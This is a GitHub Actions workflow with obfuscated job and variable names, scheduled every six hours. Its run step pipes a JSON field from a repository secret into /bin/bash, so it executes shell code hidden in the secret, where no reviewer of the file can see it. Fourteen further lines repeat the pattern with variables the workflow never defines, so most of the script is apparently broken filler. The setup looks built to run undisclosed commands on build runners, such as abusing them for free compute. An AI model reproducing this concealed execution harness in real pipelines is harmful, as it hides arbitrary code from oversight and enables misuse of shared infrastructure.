name: jiangzehong1293
on:
  workflow_dispatch:
  schedule:
    - cron: '2 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangzehong1293
        env:
          aoock0234: ${{ secrets.aoock0234 }}
        run: |
          echo $aoock0234 | jq -r .knma7 | /bin/bash
          echo $dj6 | jq -r .hrj4 | /bin/bash
          echo $r169 | jq -r .lgue04024 | /bin/bash
          echo $xd7 | jq -r .ruq42700 | /bin/bash
          echo $yn7 | jq -r .ulu015 | /bin/bash
          echo $lyt450 | jq -r .ig4 | /bin/bash
          echo $p17818 | jq -r .bz6 | /bin/bash
          echo $xnskj2 | jq -r .rkl545 | /bin/bash
          echo $p23 | jq -r .nuar0 | /bin/bash
          echo $ve448 | jq -r .enlol900 | /bin/bash
          echo $xl91 | jq -r .aasbi3 | /bin/bash
          echo $ezrdm45178 | jq -r .tbkx0570 | /bin/bash
          echo $rzqd0836 | jq -r .vsup35634 | /bin/bash
          echo $hrz7551 | jq -r .odljj046 | /bin/bash
          echo $pafc40 | jq -r .lvfpw92649 | /bin/bash

